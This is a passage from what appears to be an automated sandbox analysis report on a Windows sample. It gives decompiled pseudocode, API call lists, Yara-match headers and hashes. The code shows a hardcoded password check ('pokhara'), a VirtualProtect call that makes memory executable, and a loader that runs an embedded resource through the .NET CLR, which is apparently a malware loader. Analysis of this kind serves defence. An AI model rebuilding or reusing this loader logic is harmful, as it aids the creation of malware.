                                                  						_t23 = E00AD9A54(0x9347c911) + 0x32; // 0x32
                                                  						_t139 = _t23;
                                                  						asm("o16 nop [eax+eax]");
                                                  						do {
                                                  						} while (_t139 > E00AD9A54(0x9347c911));
                                                  						_push("*");
                                                  						E00AD1080(_t122);
                                                  						_t147 = _t147 + 4;
                                                  						_t131 = _t131 - 1;
                                                  					} while (_t131 != 0);
                                                  					do {
                                                  						_t24 = E00AD9A54(0x9347c911) + 0x32; // 0x32
                                                  						_t140 = _t24;
                                                  						do {
                                                  						} while (_t140 > E00AD9A54(0x9347c911));
                                                  						E00AD1080(_t122, "%c",  *((char*)(_t147 + _t131 + 0x2c)));
                                                  						_t131 = _t131 + 1;
                                                  						_t147 = _t147 + 8;
                                                  					} while (_t131 < 0x14);
                                                  					_t132 = 0x14;
                                                  					do {
                                                  						_t27 = E00AD9A54(0x9347c911) + 0x32; // 0x32
                                                  						_t141 = _t27;
                                                  						do {
                                                  						} while (_t141 > E00AD9A54(0x9347c911));
                                                  						_push("*");
                                                  						E00AD1080(_t122);
                                                  						_t147 = _t147 + 4;
                                                  						_t132 = _t132 - 1;
                                                  					} while (_t132 != 0);
                                                  					_t142 = GetStdHandle;
                                                  					0xb27e6c->X = 0xa000a;
                                                  					_t76 = GetStdHandle(0xfffffff5);
                                                  					_t133 = SetConsoleCursorPosition;
                                                  					SetConsoleCursorPosition(_t76, 0xb27e6c->X);
                                                  					0xb27e6c->X = 0x7000f;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					_push("Enter Password:");
                                                  					E00AD1080(_t122);
                                                  					_t148 = _t147 + 4;
                                                  					_t164 = _v21 - 0xd;
                                                  					if(_v21 == 0xd) {
                                                  						L22:
                                                  						 *((char*)(_t148 + _t103 + 0x1c)) = 0;
                                                  						_t81 =  &_v12;
                                                  						_t123 = "pokhara";
                                                  						while(1) {
                                                  							_t128 =  *_t81;
                                                  							__eflags = _t128 -  *_t123;
                                                  							if(_t128 !=  *_t123) {
                                                  								break;
                                                  							}
                                                  							__eflags = _t128;
                                                  							if(_t128 == 0) {
                                                  								L27:
                                                  								_t82 = 0;
                                                  								L29:
                                                  								__eflags = _t82;
                                                  								if(_t82 != 0) {
                                                  									0xb27e6c->X = 0x10000f;
                                                  									SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  									_push(0xb23584);
                                                  									E00AD1080(_t123);
                                                  									E00AF4817(_t128, _t142, __eflags);
                                                  									return E00B17B00(__eflags);
                                                  								} else {
                                                  									0xb27e6c->X = 0x9000f;
                                                  									SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  									E00AD1080(_t123);
                                                  									0xb27e6c->X = 0xa0011;
                                                  									SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
                                                  									E00AD1080(_t123, "Press any key to countinue.....", "Password match");
                                                  									E00AF4817(_t128, _t142, __eflags);
                                                  									return E00B1A4D0(_t103, _t123, _t128, _t133, _t142);
                                                  								}
                                                  							}
                                                  							_t128 =  *((intOrPtr*)(_t81 + 1));
                                                  							__eflags = _t128 - _t123[1];
                                                  							if(_t128 != _t123[1]) {
                                                  								break;
                                                  							}
                                                  							_t81 = _t81 + 2;
                                                  							_t123 =  &(_t123[2]);
                                                  							__eflags = _t128;
                                                  							if(_t128 != 0) {
                                                  								continue;
                                                  							}
                                                  							goto L27;
                                                  						}
                                                  						asm("sbb eax, eax");
                                                  						_t82 = _t81 | 0x00000001;
                                                  						__eflags = _t82;
                                                  						goto L29;
                                                  					} else {
                                                  						goto L18;
                                                  					}
                                                  					while(1) {
                                                  						L18:
                                                  						_t106 = E00AF4817(0x9347c911, _t142, _t164);
                                                  						if(_t106 == 0xd) {
                                                  							break;
                                                  						}
                                                  						_t164 = _t106 - 8;
                                                  						if(_t106 != 8) {
                                                  							L00AF4C9E(0x2a);
                                                  							_t98 = _v20;
                                                  							_t148 = _t148 + 4;
                                                  							 *((char*)(_t148 + _t98 + 0x1c)) = _t106;
                                                  							_v20 = _t98 + 1;
                                                  						}
                                                  					}
                                                  					_t103 = _v20;
                                                  					goto L22;
                                                  				} else {
                                                  					_t107 = 0x1805;
                                                  					_t124 = _t111 - _t138;
                                                  					do {
                                                  						_t101 =  *((intOrPtr*)(_t124 + _t138));
                                                  						_t138 = _t138 + 1;
                                                  						 *((char*)(_t138 - 1)) = _t101;
                                                  						_t107 = _t107 - 1;
                                                  					} while (_t107 != 0);
                                                  					goto L3;
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00B17E30: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,00B17B5E,00000000,00000000,00000001,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58), ref: 00B17E38
                                                    • Part of subcall function 00B17E30: RtlAllocateHeap.NTDLL(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E3F
                                                    • Part of subcall function 00B17E30: GetProcessHeap.KERNEL32(00000001,17D783FF,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E77
                                                    • Part of subcall function 00B17E30: HeapAlloc.KERNEL32(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E7E
                                                  • VirtualProtect.KERNEL32(?,00001805,00000040,?,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17C05
                                                  • GetDC.USER32(00000000), ref: 00B17C24
                                                  • GrayStringW.USER32(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007), ref: 00B17C2B
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17C50
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17C57
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17CFB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17D04
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17D18
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17D1B
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17DAB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17DAE
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17DCF
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17DD2
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17E04
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17E07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$Heap$Process$AllocAllocateGrayProtectStringVirtual
                                                  • String ID: 0THw$Enter Password:$IEUCIZEO$Password match$Press any key to countinue.....$cls$pokhara
                                                  • API String ID: 1163627389-3205554147
                                                  • Opcode ID: 1e61ed3d28820afddf24fce192b73dffeab8de0cfe43f5a1a3c1a1f01ec15d8f
                                                  • Instruction ID: 2df7124a997d62ce602c25b8c988c01647fba4d62f818d7945ebd50cf558b97d
                                                  • Opcode Fuzzy Hash: 1e61ed3d28820afddf24fce192b73dffeab8de0cfe43f5a1a3c1a1f01ec15d8f
                                                  • Instruction Fuzzy Hash: A0816BB26482405FC720BBB8EC45AEB7BE8DF49310F4545A9F559833B2DE30D9498B62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00401489() {
                                                  				void* _v8;
                                                  				long _t10;
                                                  				struct HRSRC__* _t12;
                                                  				void* _t16;
                                                  
                                                  				_t12 = FindResourceW(GetModuleHandleW(0), 1, 0xa);
                                                  				if(_t12 == 0) {
                                                  					L6:
                                                  					ExitProcess(0);
                                                  				}
                                                  				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                                                  				if(_t16 != 0) {
                                                  					_v8 = LockResource(_t16);
                                                  					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                                                  					_t13 = _v8;
                                                  					if(_v8 != 0 && _t10 != 0) {
                                                  						L00401000(_t13, _t10); // executed
                                                  					}
                                                  				}
                                                  				FreeResource(_t16);
                                                  				goto L6;
                                                  			}

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                  • FindResourceW.KERNEL32(00000000,?,?,80004003), ref: 0040149F
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                  • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                  • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                  • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                    • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                  • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                  • ExitProcess.KERNEL32 ref: 004014EE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                  • String ID: PPXs$v2.0.50727
                                                  • API String ID: 2372384083-670238402
                                                  • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                  • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                  • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                  • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00401E1D() {
                                                  				_Unknown_base(*)()* _t1;
                                                  
                                                  				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                                                  				return _t1;
                                                  			}

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001E29,00401716), ref: 00401E22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                  • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                  • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001B01,00AD12FB), ref: 00AD1AFA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 99fed7091a6c0327b10a99278b0fb22069313fabe08b7b83657129c8ff0f4bf5
                                                  • Instruction ID: 47fa52a1e16b61c770cc9c5b342f38b509434437c7ce1e78828c40259f9cf049
                                                  • Opcode Fuzzy Hash: 99fed7091a6c0327b10a99278b0fb22069313fabe08b7b83657129c8ff0f4bf5
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			_entry_(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				void* _t11;
                                                  				intOrPtr _t13;
                                                  				signed short _t18;
                                                  				char _t22;
                                                  				void* _t24;
                                                  				char _t28;
                                                  				intOrPtr _t30;
                                                  				void* _t32;
                                                  				char _t34;
                                                  				void* _t35;
                                                  				intOrPtr* _t39;
                                                  				void* _t43;
                                                  				void* _t47;
                                                  				void* _t49;
                                                  				intOrPtr* _t50;
                                                  				intOrPtr* _t51;
                                                  				void* _t52;
                                                  				intOrPtr* _t53;
                                                  				void* _t54;
                                                  
                                                  				_t49 = __esi;
                                                  				_t47 = __edi;
                                                  				_t46 = __edx;
                                                  				_t35 = __ecx;
                                                  				E00AD1850();
                                                  				E00AD1BB0(__edx, 0xb23b58, 0x14);
                                                  				_t11 = E00AD1630(_t35, __edx, 1); // executed
                                                  				if(_t11 != 0) {
                                                  					L3:
                                                  					_t34 = 0;
                                                  					 *((char*)(_t54 - 0x19)) = 0;
                                                  					 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                                  					 *((char*)(_t54 - 0x24)) = E00AD1533();
                                                  					_t13 =  *0xb26a80; // 0x2
                                                  					if(_t13 == 1) {
                                                  						goto L2;
                                                  					}
                                                  					if(_t13 != 0) {
                                                  						_t34 = 1;
                                                  						 *((char*)(_t54 - 0x19)) = 1;
                                                  						L9:
                                                  						E00AD178A( *((intOrPtr*)(_t54 - 0x24)));
                                                  						_pop(_t39);
                                                  						_t50 = E00AD1957();
                                                  						__eflags =  *_t50;
                                                  						if(__eflags != 0) {
                                                  							_t30 = E00AD1700(__eflags);
                                                  							_t39 = _t50;
                                                  							__eflags = _t30;
                                                  							if(_t30 != 0) {
                                                  								_t53 =  *_t50;
                                                  								_t39 = _t53;
                                                  								L00AD1BA0();
                                                  								 *_t53(0, 2, 0);
                                                  							}
                                                  						}
                                                  						_t51 = E00AD195D();
                                                  						__eflags =  *_t51;
                                                  						if(__eflags != 0) {
                                                  							_t28 = E00AD1700(__eflags);
                                                  							_t39 = _t51;
                                                  							__eflags = _t28;
                                                  							if(_t28 != 0) {
                                                  								E00AD918A(_t34, _t46, 0,  *_t51);
                                                  								_pop(_t39);
                                                  							}
                                                  						}
                                                  						_t18 = E00AD1A7E();
                                                  						_t52 = E00B1A8C0(_t51, __eflags, 0xad0000, 0, E00AF2722(), _t18 & 0x0000ffff);
                                                  						_t22 = E00AD1AB1();
                                                  						__eflags = _t22;
                                                  						if(_t22 == 0) {
                                                  							E00AD91C2(_t52);
                                                  						}
                                                  						__eflags = _t34;
                                                  						if(_t34 == 0) {
                                                  							E00AD915F();
                                                  						}
                                                  						E00AD17A7(_t39, 0, _t52, 1, 0);
                                                  						 *(_t54 - 4) = 0xfffffffe;
                                                  						_t24 = _t52;
                                                  						L20:
                                                  						return E00AD1BF6(_t24, _t46);
                                                  					}
                                                  					 *0xb26a80 = 1;
                                                  					_t32 = E00AF27D1(1, _t47, _t49, 0xb1b270, 0xb1b290); // executed
                                                  					_pop(_t43);
                                                  					if(_t32 == 0) {
                                                  						E00AF2775(0, _t43, _t47, _t49, 0xb1b264, 0xb1b26c); // executed
                                                  						 *0xb26a80 = 2;
                                                  						goto L9;
                                                  					}
                                                  					 *(_t54 - 4) = 0xfffffffe;
                                                  					_t24 = 0xff;
                                                  					goto L20;
                                                  				} else {
                                                  					L2:
                                                  					E00AD1963(_t46, _t47, 7);
                                                  					goto L3;
                                                  				}
                                                  			}

                                                  APIs
                                                  • ___security_init_cookie.LIBCMT ref: 00AD1308
                                                  • ___scrt_fastfail.LIBCMT ref: 00AD132C
                                                    • Part of subcall function 00AD1963: IsProcessorFeaturePresent.KERNEL32(00000017,?,00000000), ref: 00AD1970
                                                    • Part of subcall function 00AD1963: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?,00000000), ref: 00AD1A38
                                                    • Part of subcall function 00AD1963: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,00000017,?,00000000), ref: 00AD1A57
                                                    • Part of subcall function 00AD1963: UnhandledExceptionFilter.KERNEL32(?,?,?,?,00000017,?,00000000), ref: 00AD1A61
                                                  • ___scrt_release_startup_lock.LIBCMT ref: 00AD13A3
                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00AD13B7
                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00AD13DC
                                                  • ___scrt_get_show_window_mode.LIBCMT ref: 00AD13EE
                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 00AD1425
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled___scrt_is_nonwritable_in_current_image$DebuggerFeatureProcessor___scrt_fastfail___scrt_get_show_window_mode___scrt_release_startup_lock___scrt_uninitialize_crt___security_init_cookie
                                                  • String ID:
                                                  • API String ID: 1925394571-0
                                                  • Opcode ID: 9261b29a7d62293a0fcf770875a17a5738b90b5ade924a422cdd7e3989610654
                                                  • Instruction ID: e1d63cc2b207e61a9a044b17098ca09ef0a0c16aee5d7fe8c77fdee0df75df78
                                                  • Opcode Fuzzy Hash: 9261b29a7d62293a0fcf770875a17a5738b90b5ade924a422cdd7e3989610654
                                                  • Instruction Fuzzy Hash: D9217931684341BADB207BB45E17BAE33A05F427A0F64025FF4837B7E3CE618D4596A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,00B17B5E,00000000,00000000,00000001,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58), ref: 00B17E38
                                                  • RtlAllocateHeap.NTDLL(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E3F
                                                  • GetProcessHeap.KERNEL32(00000001,17D783FF,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E77
                                                  • HeapAlloc.KERNEL32(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E7E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Heap$Process$AllocAllocate
                                                  • String ID:
                                                  • API String ID: 1154092256-0
                                                  • Opcode ID: e3acc49b77d49f695ec969fa03593da26f69a35030d1ae0da796f9bf8dd07c86
                                                  • Instruction ID: 8c7322025522d006b6ad8c3cefcd5db01c8625a54f25ae24e94131e7df499b5a
                                                  • Opcode Fuzzy Hash: e3acc49b77d49f695ec969fa03593da26f69a35030d1ae0da796f9bf8dd07c86
                                                  • Instruction Fuzzy Hash: 4BF0A9B66852106FEB051A789C6CEFB77ECEB0A309FA080C8F116C3250CF62CD498660
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 586741f2ef224cbfee35a90a0135548767e9caf773e92fa8876b4fdf8ade35ce
                                                  • Instruction ID: b8de53af448f8269a8265b6b1c74931160753f63666a221ad20a8ca91e9911de
                                                  • Opcode Fuzzy Hash: 586741f2ef224cbfee35a90a0135548767e9caf773e92fa8876b4fdf8ade35ce
                                                  • Instruction Fuzzy Hash: C8E0653264652451E63177BE7C1A77B15D98B81331F214326F7208B0D0DF744846A76E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00AF4F03: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AFC8B7,00000001,00000364,00000006,000000FF,?,B47FD95F,00AF69E8,00AF4D88,?,?,00AF440C), ref: 00AF4F44
                                                  • _free.LIBCMT ref: 00B034C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: a6df90cbad36204b6bf6c80459d7ebd26b378b66fe9799a8705ac52e664afbb5
                                                  • Instruction ID: 76dff93852f1e579a9eb96b4ddd152afb66f5277d6c0391e024aa7be59bbcb9f
                                                  • Opcode Fuzzy Hash: a6df90cbad36204b6bf6c80459d7ebd26b378b66fe9799a8705ac52e664afbb5
                                                  • Instruction Fuzzy Hash: BC01D6722003096BE7219FA99885A6EFFDDEB89370F25055DF694872C0EA30A9058774
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AFC8B7,00000001,00000364,00000006,000000FF,?,B47FD95F,00AF69E8,00AF4D88,?,?,00AF440C), ref: 00AF4F44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 8af6602521502147236345949d549688bfa40b44ea3fc076c3d60947b2b40d4e
                                                  • Instruction ID: 1f0eb0222b53068a30cf4d20264edbd05c7a3e0034a40d05b46bf11163c7d23e
                                                  • Opcode Fuzzy Hash: 8af6602521502147236345949d549688bfa40b44ea3fc076c3d60947b2b40d4e
                                                  • Instruction Fuzzy Hash: D0F0E93160412C6BDB215BE29D05B7F37989F49F60B158021BB1CE7195CF30EC0083E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 76%
                                                  			E00B0E962(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				int _v16;
                                                  				int _v20;
                                                  				int _v24;
                                                  				char _v52;
                                                  				int _v56;
                                                  				int _v60;
                                                  				signed int _v100;
                                                  				char _v272;
                                                  				intOrPtr _v276;
                                                  				char _v280;
                                                  				char _v356;
                                                  				char _v360;
                                                  				void* __ebp;
                                                  				signed int _t64;
                                                  				signed int _t71;
                                                  				signed int _t73;
                                                  				signed int _t77;
                                                  				signed int _t84;
                                                  				signed int _t88;
                                                  				signed int _t90;
                                                  				long _t92;
                                                  				signed int* _t95;
                                                  				signed int _t98;
                                                  				signed int _t101;
                                                  				signed int _t105;
                                                  				void* _t112;
                                                  				signed int _t115;
                                                  				void* _t116;
                                                  				void* _t118;
                                                  				void* _t119;
                                                  				signed int _t123;
                                                  				signed int _t124;
                                                  				signed int* _t127;
                                                  				signed int _t128;
                                                  				void* _t131;
                                                  				void* _t133;
                                                  				signed int _t134;
                                                  				signed int _t136;
                                                  				void* _t139;
                                                  				intOrPtr _t140;
                                                  				void* _t142;
                                                  				signed int _t149;
                                                  				signed int _t150;
                                                  				signed int _t153;
                                                  				signed int _t157;
                                                  				signed int _t160;
                                                  				intOrPtr* _t165;
                                                  				intOrPtr _t166;
                                                  				signed int _t167;
                                                  				intOrPtr* _t168;
                                                  				void* _t169;
                                                  				void* _t170;
                                                  				signed int _t171;
                                                  				int _t175;
                                                  				signed int _t177;
                                                  				char** _t178;
                                                  				signed int _t182;
                                                  				signed int _t183;
                                                  				void* _t190;
                                                  				signed int _t191;
                                                  				void* _t192;
                                                  				signed int _t193;
                                                  
                                                  				_t177 = __esi;
                                                  				_t170 = __edi;
                                                  				_t64 = E00B0E00D();
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t136 = _t64;
                                                  				_v16 = _v16 & 0x00000000;
                                                  				_v12 = _t136;
                                                  				if(E00B0E06B( &_v8) != 0 || E00B0E013( &_v16) != 0) {
                                                  					L45:
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					E00AF68E9();
                                                  					asm("int3");
                                                  					_t190 = _t192;
                                                  					_t193 = _t192 - 0x10;
                                                  					_push(_t136);
                                                  					_t178 = E00B0E00D();
                                                  					_v52 = 0;
                                                  					_v56 = 0;
                                                  					_v60 = 0;
                                                  					_t71 = E00B0E06B( &_v52);
                                                  					_t142 = _t177;
                                                  					__eflags = _t71;
                                                  					if(_t71 != 0) {
                                                  						L65:
                                                  						_push(0);
                                                  						_push(0);
                                                  						_push(0);
                                                  						_push(0);
                                                  						_push(0);
                                                  						E00AF68E9();
                                                  						asm("int3");
                                                  						_push(_t190);
                                                  						_t191 = _t193;
                                                  						_t73 =  *0xb26018; // 0xb47fd95f
                                                  						_v100 = _t73 ^ _t191;
                                                  						 *0xb26924 =  *0xb26924 | 0xffffffff;
                                                  						 *0xb26918 =  *0xb26918 | 0xffffffff;
                                                  						_push(0);
                                                  						_push(_t178);
                                                  						_push(_t170);
                                                  						_t171 = 0;
                                                  						 *0xb27da8 = 0;
                                                  						_t77 = L00AFDF46(_t166, __eflags,  &_v360,  &_v356, 0x100, 0xb21b0c);
                                                  						__eflags = _t77;
                                                  						if(_t77 != 0) {
                                                  							__eflags = _t77 - 0x22;
                                                  							if(_t77 == 0x22) {
                                                  								_t183 = L00AF4D9C(_t142, _v276);
                                                  								__eflags = _t183;
                                                  								if(__eflags != 0) {
                                                  									_t84 = L00AFDF46(_t166, __eflags,  &_v280, _t183, _v276, 0xb21b0c);
                                                  									__eflags = _t84;
                                                  									if(_t84 == 0) {
                                                  										L00AF4D62(0);
                                                  										_t171 = _t183;
                                                  									} else {
                                                  										_push(_t183);
                                                  										goto L71;
                                                  									}
                                                  								} else {
                                                  									_push(0);
                                                  									L71:
                                                  									L00AF4D62();
                                                  								}
                                                  							}
                                                  						} else {
                                                  							_t171 =  &_v272;
                                                  						}
                                                  						asm("sbb esi, esi");
                                                  						_t182 =  ~(_t171 -  &_v272) & _t171;
                                                  						__eflags = _t171;
                                                  						if(_t171 == 0) {
                                                  							L79:
                                                  							L46();
                                                  						} else {
                                                  							__eflags =  *_t171;
                                                  							if(__eflags == 0) {
                                                  								goto L79;
                                                  							} else {
                                                  								_push(_t171);
                                                  								E00B0E962(0xb21b0c, _t171, _t182, __eflags);
                                                  							}
                                                  						}
                                                  						L00AF4D62(_t182);
                                                  						__eflags = _v16 ^ _t191;
                                                  						return L00AD1DCD(_v16 ^ _t191);
                                                  					} else {
                                                  						_t88 = E00B0E013( &_v16);
                                                  						_pop(_t142);
                                                  						__eflags = _t88;
                                                  						if(_t88 != 0) {
                                                  							goto L65;
                                                  						} else {
                                                  							_t90 = E00B0E03F( &_v20);
                                                  							_pop(_t142);
                                                  							__eflags = _t90;
                                                  							if(_t90 != 0) {
                                                  								goto L65;
                                                  							} else {
                                                  								L00AF4D62( *0xb27da0);
                                                  								 *0xb27da0 = 0;
                                                  								 *_t193 = 0xb27db0;
                                                  								_t92 = GetTimeZoneInformation(??);
